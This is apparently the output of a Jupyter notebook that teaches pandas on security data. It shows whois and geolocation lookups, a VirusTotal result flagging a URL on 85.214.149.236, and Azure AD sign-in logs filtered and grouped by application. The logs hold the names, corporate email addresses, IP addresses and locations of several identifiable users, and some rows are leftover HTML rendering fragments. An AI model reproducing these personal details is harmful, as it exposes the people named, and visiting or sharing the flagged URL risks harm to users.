| | asn | asn_cidr | asn_country_code | asn_date | asn_description | asn_registry | nets | nir | query | raw | raw_referral | referral |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 0 | 7922 | 24.16.0.0/13 | US | 2003-10-06 | COMCAST-7922, US | arin | [{'cidr': '24.0.0.0/12, 24.16.0.0/13', 'name': 'EASTERNSHORE-1', 'handle': 'NET-24-0-0-0-1', 'ra... | None | 24.16.133.227 | None | None | None |
| | CountryCode | CountryName | State | City | Longitude | Latitude | Asn | edges | Type | AdditionalData | IpAddress |
|---|---|---|---|---|---|---|---|---|---|---|---|
| 0 | US | United States | Washington | Bellevue | -122.2053 | 47.6131 | None | {} | geolocation | {} | 24.16.133.227 |
| | nir | asn_registry | asn | asn_cidr | asn_country_code | asn_date | asn_description | query | nets | raw | referral | raw_referral |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 0 | None | arin | 8075 | 40.76.0.0/14 | US | 2015-02-23 | MICROSOFT-CORP-MSN-AS-BLOCK, US | 40.76.220.11 | [{'cidr': '40.80.0.0/12, 40.120.0.0/14, 40.76.0.0/14, 40.112.0.0/13, 40.74.0.0/15, 40.124.0.0/16... | None | None | None |
| 2 | None | ripencc | 3216 | 81.211.96.0/19 | RU | 2002-11-04 | SOVAM-AS, RU | 81.211.111.100 | [{'cidr': '81.211.111.96/27', 'name': 'SOVINTEL-GlobusAvia', 'handle': 'BN891-RIPE', 'range': '8... | None | None | None |
| 3 | None | ripencc | 12400 | 87.71.160.0/19 | IL | 2005-06-30 | PARTNER-AS, IL | 87.71.180.127 | [{'cidr': '87.71.176.0/21', 'name': 'DHCP-121-OD', 'handle': 'DR5299-RIPE', 'range': '87.71.176.... | None | None | None |
| 5 | None | ripencc | 15557 | 89.156.0.0/14 | FR | 2006-04-11 | LDCOMNET, FR | 89.159.53.43 | [{'cidr': '89.156.0.0/14', 'name': 'FR-SFR-20050726', 'handle': 'LD699-RIPE', 'range': '89.156.0... | None | None | None |
| 6 | None | ripencc | 12849 | 5.29.48.0/21 | IL | 2012-05-08 | HOTNET-IL AMS-IX Admin LAN, IL | 5.29.52.252 | [{'cidr': '5.29.48.0/21', 'name': 'HOTNET-4', 'handle': 'AL8020-RIPE', 'range': '5.29.48.0 - 5.2... | None | None | None |
| | IPAddress | AppDisplayName | TimeGenerated | nir | asn_registry | asn | asn_cidr | asn_country_code | asn_date | asn_description | query | nets | raw | referral | raw_referral |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 0 | 40.76.220.11 | Microsoft Azure Active Directory Connect | 2021-06-28 10:55:21.648000+00:00 | None | arin | 8075 | 40.76.0.0/14 | US | 2015-02-23 | MICROSOFT-CORP-MSN-AS-BLOCK, US | 40.76.220.11 | [{'cidr': '40.80.0.0/12, 40.120.0.0/14, 40.76.0.0/14, 40.112.0.0/13, 40.74.0.0/15, 40.124.0.0/16... | None | None | None |
| 1 | 81.211.111.100 | Azure Portal | 2021-06-28 11:36:15.896000+00:00 | None | ripencc | 3216 | 81.211.96.0/19 | RU | 2002-11-04 | SOVAM-AS, RU | 81.211.111.100 | [{'cidr': '81.211.111.96/27', 'name': 'SOVINTEL-GlobusAvia', 'handle': 'BN891-RIPE', 'range': '8... | None | None | None |
| 2 | 87.71.180.127 | Azure Portal | 2021-06-28 12:24:50.274000+00:00 | None | ripencc | 12400 | 87.71.160.0/19 | IL | 2005-06-30 | PARTNER-AS, IL | 87.71.180.127 | [{'cidr': '87.71.176.0/21', 'name': 'DHCP-121-OD', 'handle': 'DR5299-RIPE', 'range': '87.71.176.... | None | None | None |
| 3 | 89.159.53.43 | Azure Portal | 2021-06-28 12:24:40.501000+00:00 | None | ripencc | 15557 | 89.156.0.0/14 | FR | 2006-04-11 | LDCOMNET, FR | 89.159.53.43 | [{'cidr': '89.156.0.0/14', 'name': 'FR-SFR-20050726', 'handle': 'LD699-RIPE', 'range': '89.156.0... | None | None | None |
| 4 | 5.29.52.252 | Azure Advanced Threat Protection | 2021-06-28 12:36:12.329000+00:00 | None | ripencc | 12849 | 5.29.48.0/21 | IL | 2012-05-08 | HOTNET-IL AMS-IX Admin LAN, IL | 5.29.52.252 | [{'cidr': '5.29.48.0/21', 'name': 'HOTNET-4', 'handle': 'AL8020-RIPE', 'range': '5.29.48.0 - 5.2... | None | None | None |
| VirusTotal | |
|---|---|
| verbose_msg | Scan finished, scan information embedded in this object |
| response_code | 1 |
| positives | 8 |
| resource | http://85.214.149.236:443/sugarcrm/themes/default/images/ |
| permalink | https://www.virustotal.com/gui/url/5cfb347b4631f015338e0c143de3b67926e7dc53b048e3dcc927d78bd0f40b55/detection/u-5cfb347b4631f015338e0c143de3b67926e7dc53b048e3dcc927d78bd0f40b55-1624240252 |
(DataFrame output: 3 rows x 69 columns of SigninLogs. Displayed columns: TenantId, SourceSystem, TimeGenerated, ResourceId, OperationName, OperationVersion, Category, ResultType, ResultSignature, ResultDescription, DurationMs, CorrelationId, Resource, ResourceGroup, ResourceProvider, Identity, Level, Location, AlternateSignInName, AppDisplayName, AppId, AuthenticationDetails, AuthenticationMethodsUsed, AuthenticationProcessingDetails, AuthenticationRequirement, ..., RiskLevelDuringSignIn, RiskState, ResourceDisplayName, ResourceIdentity, ServicePrincipalId, ServicePrincipalName, Status, TokenIssuerName, TokenIssuerType, UserAgent, UserDisplayName, UserId, UserPrincipalName, AADTenantId, UserType, FlaggedForReview, IPAddressFromResourceProvider, SignInIdentifier, SignInIdentifierType, ResourceTenantId, HomeTenantId, Type, Result, Latitude, Longitude; the middle columns are elided by the display width.)
Data size:
DataFrame shape is 2136 rows x 69 columns

Display the first 2 rows using head():
(DataFrame output: 2 rows x 69 columns; the SigninLogs rows with index 0 and 1, with the same columns as the table above.)
Display the 3rd row using iloc[]:

Show the column names in the DataFrame

Display just the TimeGenerated and TenantId columns:
| | TimeGenerated | TenantId |
|---|---|---|
| 0 | 2021-06-28 10:55:21.648000+00:00 | 8ecf8077-cf51-4820-aadd-14040956f35d |
| 1 | 2021-06-28 10:55:26.252000+00:00 | 8ecf8077-cf51-4820-aadd-14040956f35d |
| 2 | 2021-06-28 11:36:15.896000+00:00 | 8ecf8077-cf51-4820-aadd-14040956f35d |
| 3 | 2021-06-28 12:24:50.274000+00:00 | 8ecf8077-cf51-4820-aadd-14040956f35d |
| 4 | 2021-06-28 12:24:44.957000+00:00 | 8ecf8077-cf51-4820-aadd-14040956f35d |
`data[<boolean expression>]` returns all rows in the DataFrame where the boolean expression is True.
Display only rows where AppDisplayName value is 'Azure Portal':
(DataFrame output: the SigninLogs rows with index 2, 3 and 4, 69 columns each, all with AppDisplayName 'Azure Portal'.)
5 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 12:24:40.501000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "9e5f0875-91cf-423f-8bbe-36c6f31bc5a5 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | MAHE, Edouard | \n", "4 | \n", "FR | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T12:24:40.5011019+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "MAHE, Edouard | \n", "36d6777f-e4a7-4d8b-ac7d-9db0cf1138b0 | \n", "edouard.mahe@sogeti.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "76a2ae5a-9f00-4f6b-95ed-5d33d77c4d61 | \n", "SigninLogs | \n", "Sucess | \n", "48.79909896850586 | \n", "2.262470006942749 | \n", "
9 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 12:55:10.995000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "cff2d84e-8faf-4367-a551-b315ebd59aac | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Miemiec, Emanuel | \n", "4 | \n", "PL | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T12:55:10.9951954+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.443... | \n", "Miemiec, Emanuel | \n", "b112c84a-fe47-4428-b3af-14ea028e6bf7 | \n", "emanuel.miemiec@capgemini.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "76a2ae5a-9f00-4f6b-95ed-5d33d77c4d61 | \n", "SigninLogs | \n", "Sucess | \n", "50.06748962402344 | \n", "18.64970016479492 | \n", "
5 rows 69 columns
Display rows where ClientAppUsed is either 'Browser' or 'Mobile Apps and Desktop clients':
| | TenantId | SourceSystem | TimeGenerated | ResourceId | OperationName | OperationVersion | Category | ResultType | ResultSignature | ResultDescription | DurationMs | CorrelationId | Resource | ResourceGroup | ResourceProvider | Identity | Level | Location | AlternateSignInName | AppDisplayName | AppId | AuthenticationDetails | AuthenticationMethodsUsed | AuthenticationProcessingDetails | AuthenticationRequirement | ... | RiskLevelDuringSignIn | RiskState | ResourceDisplayName | ResourceIdentity | ServicePrincipalId | ServicePrincipalName | Status | TokenIssuerName | TokenIssuerType | UserAgent | UserDisplayName | UserId | UserPrincipalName | AADTenantId | UserType | FlaggedForReview | IPAddressFromResourceProvider | SignInIdentifier | SignInIdentifierType | ResourceTenantId | HomeTenantId | Type | Result | Latitude | Longitude |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 0 | 8ecf8077-cf51-4820-aadd-14040956f35d | Azure AD | 2021-06-28 10:55:21.648000+00:00 | /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | Sign-in activity | 1.0 | SignInLogs | 0 | None | | 0 | 9558f30b-a1db-4676-a586-7db608bdaa69 | Microsoft.aadiam | Microsoft.aadiam | | On-Premises Directory Synchronization Service Account | 4 | US | Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | Microsoft Azure Active Directory Connect | cb1056e2-e479-49de-ae31-7812af012ed8 | [\r\n {\r\n "authenticationStepDateTime": "2021-06-28T10:55:21.6485011+00:00",\r\n "authe... | | [\r\n {\r\n "key": "IsCAEToken",\r\n "value": "False"\r\n }\r\n] | singleFactorAuthentication | ... | none | none | Windows Azure Active Directory | 00000002-0000-0000-c000-000000000000 | | | {'errorCode': 0} | | AzureAD | | On-Premises Directory Synchronization Service Account | 2235a468-ad9c-4375-8008-0a7be76994a7 | sync_aadcon_a5225d32ba79@seccxpninja.onmicrosoft.com | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | Member | None | | Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | SigninLogs | Sucess | 38.73078155517578 | -78.17196655273438 |
| 1 | 8ecf8077-cf51-4820-aadd-14040956f35d | Azure AD | 2021-06-28 10:55:26.252000+00:00 | /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | Sign-in activity | 1.0 | SignInLogs | 0 | None | | 0 | dac1edbe-1985-4f78-8d20-f4725e28b865 | Microsoft.aadiam | Microsoft.aadiam | | On-Premises Directory Synchronization Service Account | 4 | US | Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | Microsoft Azure Active Directory Connect | cb1056e2-e479-49de-ae31-7812af012ed8 | [\r\n {\r\n "authenticationStepDateTime": "2021-06-28T10:55:26.2522747+00:00",\r\n "authe... | | [\r\n {\r\n "key": "IsCAEToken",\r\n "value": "False"\r\n }\r\n] | singleFactorAuthentication | ... | none | none | Windows Azure Active Directory | 00000002-0000-0000-c000-000000000000 | | | {'errorCode': 0} | | AzureAD | | On-Premises Directory Synchronization Service Account | 2235a468-ad9c-4375-8008-0a7be76994a7 | sync_aadcon_a5225d32ba79@seccxpninja.onmicrosoft.com | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | Member | None | | Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | SigninLogs | Sucess | 38.7130012512207 | -78.15899658203125 |
| 2 | 8ecf8077-cf51-4820-aadd-14040956f35d | Azure AD | 2021-06-28 11:36:15.896000+00:00 | /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | Sign-in activity | 1.0 | SignInLogs | 0 | None | | 0 | 974ea11a-7ed4-4cfd-b86b-d3d4b5bd547f | Microsoft.aadiam | Microsoft.aadiam | | Arseny Vasilev | 4 | RU | | Azure Portal | c44b4083-3bb0-49c1-b47d-974e53cbdf3c | [\r\n {\r\n "authenticationStepDateTime": "2021-06-28T11:36:15.8961297+00:00",\r\n "authe... | | [\r\n {\r\n "key": "IsCAEToken",\r\n "value": "False"\r\n }\r\n] | singleFactorAuthentication | ... | none | none | Windows Azure Service Management API | 797f4846-ba00-4fd7-ba43-dac1f8f63013 | | | {'errorCode': 0} | | AzureAD | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | Arseny Vasilev | 9267d02c-5f76-40a9-a9eb-b686f3ca47aa | avasilev@viacode.com | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | Guest | None | | | | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | 5fccd68a-e65e-46ae-96b1-2d896d680249 | SigninLogs | Sucess | 59.93904113769531 | 30.3157901763916 |
| 3 | 8ecf8077-cf51-4820-aadd-14040956f35d | Azure AD | 2021-06-28 12:24:50.274000+00:00 | /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | Sign-in activity | 1.0 | SignInLogs | 0 | None | | 0 | d1c11047-9e6d-4814-80fc-334c453582a3 | Microsoft.aadiam | Microsoft.aadiam | | Koby Koren | 4 | IL | | Azure Portal | c44b4083-3bb0-49c1-b47d-974e53cbdf3c | [\r\n {\r\n "authenticationStepDateTime": "2021-06-28T12:24:50.2743176+00:00",\r\n "authe... | | [\r\n {\r\n "key": "Login Hint Present",\r\n "value": "True"\r\n },\r\n {\r\n "key":... | singleFactorAuthentication | ... | none | none | Windows Azure Service Management API | 797f4846-ba00-4fd7-ba43-dac1f8f63013 | | | {'errorCode': 0} | | AzureAD | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | Koby Koren | da48f21e-2f91-4c6a-9d30-56fd10a24672 | kobyk@microsoft.com | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | Guest | None | | | | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | 72f988bf-86f1-41af-91ab-2d7cd011db47 | SigninLogs | Sucess | 32.16241073608399 | 34.84468078613281 |
| 4 | 8ecf8077-cf51-4820-aadd-14040956f35d | Azure AD | 2021-06-28 12:24:44.957000+00:00 | /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | Sign-in activity | 1.0 | SignInLogs | 0 | None | | 0 | 60855931-eec4-466c-a24e-ba630c087a3e | Microsoft.aadiam | Microsoft.aadiam | | Koby Koren | 4 | IL | | Azure Portal | c44b4083-3bb0-49c1-b47d-974e53cbdf3c | [\r\n {\r\n "authenticationStepDateTime": "2021-06-28T12:24:44.9579314+00:00",\r\n "authe... | | [\r\n {\r\n "key": "Login Hint Present",\r\n "value": "True"\r\n },\r\n {\r\n "key":... | singleFactorAuthentication | ... | none | none | Windows Azure Service Management API | 797f4846-ba00-4fd7-ba43-dac1f8f63013 | | | {'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'} | | AzureAD | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | Koby Koren | da48f21e-2f91-4c6a-9d30-56fd10a24672 | kobyk@microsoft.com | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | Guest | None | | | | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | 72f988bf-86f1-41af-91ab-2d7cd011db47 | SigninLogs | Sucess | 32.16241073608399 | 34.84468078613281 |

5 rows × 69 columns
Per-application count of non-null values in every column, grouped by AppDisplayName (30 rows × 68 columns). The displayed columns are TenantId, SourceSystem, TimeGenerated, ResourceId, OperationName, OperationVersion, Category, ResultType, ResultSignature, ResultDescription, DurationMs, CorrelationId, Resource, ResourceGroup, ResourceProvider, Identity, Level, Location, AlternateSignInName, AppId, AuthenticationDetails, AuthenticationMethodsUsed, AuthenticationProcessingDetails, AuthenticationRequirement, AuthenticationRequirementPolicies, ..., RiskLevelDuringSignIn, RiskState, ResourceDisplayName, ResourceIdentity, ServicePrincipalId, ServicePrincipalName, Status, TokenIssuerName, TokenIssuerType, UserAgent, UserDisplayName, UserId, UserPrincipalName, AADTenantId, UserType, FlaggedForReview, IPAddressFromResourceProvider, SignInIdentifier, SignInIdentifierType, ResourceTenantId, HomeTenantId, Type, Result, Latitude, Longitude. For each application every column carries the same count, except FlaggedForReview, which is 0 throughout; the table is condensed to those two values:

| AppDisplayName | Count (all columns except FlaggedForReview) | FlaggedForReview |
|---|---|---|
| | 1 | 0 |
| ACOM Azure Website | 3 | 0 |
| App Service | 3 | 0 |
| Azure AD Identity Governance - Entitlement Management | 1 | 0 |
| Azure Active Directory PowerShell | 8 | 0 |
| Azure Advanced Threat Protection | 19 | 0 |
| Azure DevOps | 7 | 0 |
| Azure Machine Learning Workbench Web App | 2 | 0 |
| Azure Portal | 884 | 0 |
| Azure Synapse Studio | 2 | 0 |
| Intranet | 1 | 0 |
| Microsoft 365 Security and Compliance Center | 32 | 0 |
| Microsoft App Access Panel | 5 | 0 |
| Microsoft Azure Active Directory Connect | 985 | 0 |
| Microsoft Azure CLI | 4 | 0 |
| Microsoft Azure PowerShell | 1 | 0 |
| Microsoft Azure Purview Studio | 75 | 0 |
| Microsoft Cloud App Security | 5 | 0 |
| Microsoft Docs | 10 | 0 |
| Microsoft Edge | 2 | 0 |
| Microsoft Invitation Acceptance Portal | 2 | 0 |
| Microsoft Office 365 Portal | 2 | 0 |
| Microsoft Power BI | 2 | 0 |
| Microsoft Stream Portal | 2 | 0 |
| My Apps | 1 | 0 |
| My Profile | 6 | 0 |
| O365 Suite UX | 1 | 0 |
| Office 365 SharePoint Online | 11 | 0 |
| Office365 Shell WCSS-Client | 57 | 0 |
| WindowsDefenderATP Portal | 2 | 0 |

30 rows × 68 columns
\n", "\n", " | AppCount | \n", "
---|---|
AppDisplayName | \n", "\n", " |
\n", " | 1 | \n", "
ACOM Azure Website | \n", "3 | \n", "
App Service | \n", "3 | \n", "
Azure AD Identity Governance - Entitlement Management | \n", "1 | \n", "
Azure Active Directory PowerShell | \n", "8 | \n", "
Azure Advanced Threat Protection | \n", "19 | \n", "
Azure DevOps | \n", "7 | \n", "
Azure Machine Learning Workbench Web App | \n", "2 | \n", "
Azure Portal | \n", "884 | \n", "
Azure Synapse Studio | \n", "2 | \n", "
Intranet | \n", "1 | \n", "
Microsoft 365 Security and Compliance Center | \n", "32 | \n", "
Microsoft App Access Panel | \n", "5 | \n", "
Microsoft Azure Active Directory Connect | \n", "985 | \n", "
Microsoft Azure CLI | \n", "4 | \n", "
Microsoft Azure PowerShell | \n", "1 | \n", "
Microsoft Azure Purview Studio | \n", "75 | \n", "
Microsoft Cloud App Security | \n", "5 | \n", "
Microsoft Docs | \n", "10 | \n", "
Microsoft Edge | \n", "2 | \n", "
Microsoft Invitation Acceptance Portal | \n", "2 | \n", "
Microsoft Office 365 Portal | \n", "2 | \n", "
Microsoft Power BI | \n", "2 | \n", "
Microsoft Stream Portal | \n", "2 | \n", "
My Apps | \n", "1 | \n", "
My Profile | \n", "6 | \n", "
O365 Suite UX | \n", "1 | \n", "
Office 365 SharePoint Online | \n", "11 | \n", "
Office365 Shell WCSS-Client | \n", "57 | \n", "
WindowsDefenderATP Portal | \n", "2 | \n", "
\n", " | TenantId | \n", "AppDisplayName | \n", "TimeGenerated | \n", "NewCol | \n", "Plus1Hr | \n", "
---|---|---|---|---|---|
0 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Microsoft Azure Active Directory Connect | \n", "2021-06-28 10:55:21.648000+00:00 | \n", "Look at my new data! | \n", "2021-06-29 10:55:21.648000+00:00 | \n", "
1 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Microsoft Azure Active Directory Connect | \n", "2021-06-28 10:55:26.252000+00:00 | \n", "Look at my new data! | \n", "2021-06-29 10:55:26.252000+00:00 | \n", "
2 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure Portal | \n", "2021-06-28 11:36:15.896000+00:00 | \n", "Look at my new data! | \n", "2021-06-29 11:36:15.896000+00:00 | \n", "
3 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure Portal | \n", "2021-06-28 12:24:50.274000+00:00 | \n", "Look at my new data! | \n", "2021-06-29 12:24:50.274000+00:00 | \n", "
4 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure Portal | \n", "2021-06-28 12:24:44.957000+00:00 | \n", "Look at my new data! | \n", "2021-06-29 12:24:44.957000+00:00 | \n", "